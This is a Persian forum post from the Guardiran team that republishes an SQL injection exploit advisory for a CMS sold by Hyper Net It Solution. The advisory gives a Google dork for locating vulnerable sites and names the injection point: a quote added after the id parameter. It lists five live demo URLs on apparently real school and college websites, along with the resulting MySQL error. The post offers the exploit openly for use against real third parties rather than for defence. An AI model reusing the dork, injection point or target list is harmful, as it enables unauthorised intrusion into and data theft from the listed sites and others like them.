discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

ثبت اکسپلویت Hyper Net It Solution cms Sql Injection Vulnerability توسط تیم امنیتی گارد ایران.

این اکسپلویت توسط J.ALL_EdIT0r کشف شد و کامل و ثبت شد.تشکر از دوستا عزیزمون.

http://iedb.ir/exploits-5368.html
###########################

# Hyper Net It Solution cms Sql Injection Vulnerability

###########################

# Exploit Title: Hyper Net It Solution cms Sql Injection
# Google Dork: intext:\"Developed by Hyper Net It Solution\" & inurl:id=
# Date: 6/28/2016
# Exploit Author: Guardiran Security Team
# Vendor Homepage: http://hypernetsolutions.com/
# Version: All Version
# Tested on: windows 10,kali linux
# Category: webapps

HEllo Guys.
This Is a Sql Injection Vulnerability
You Can Inject The Sites Without Bypass

----------------------------------

SQL INJECTION :

This CMS And Also Have SQLI Vulnerability.
We Cnd Found The Vulnerability With Putting The \" or \' After Number ID

Demo :
http://svnmvedu.in/page.php?id=35
http://smdmahavidyalaya.org/page.php?id=43
http://mgpiti.com/page.php?id=32%27
http://www.samarpancollege.in/page.php?id=26
http://madhavpublicschool.org/news.php?id=41%27

Response:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\'43\'\'\' at line 1

* Special Tnx : cod3!nj3ct!0n , REX , MR.IMAN , alizombie , dastmale-sorkh , 1TED , Reza Attcker
* Discovered By : J.ALL_EdIT0r
* We Are Guardiran Security Team

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-07-03]

###########################

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری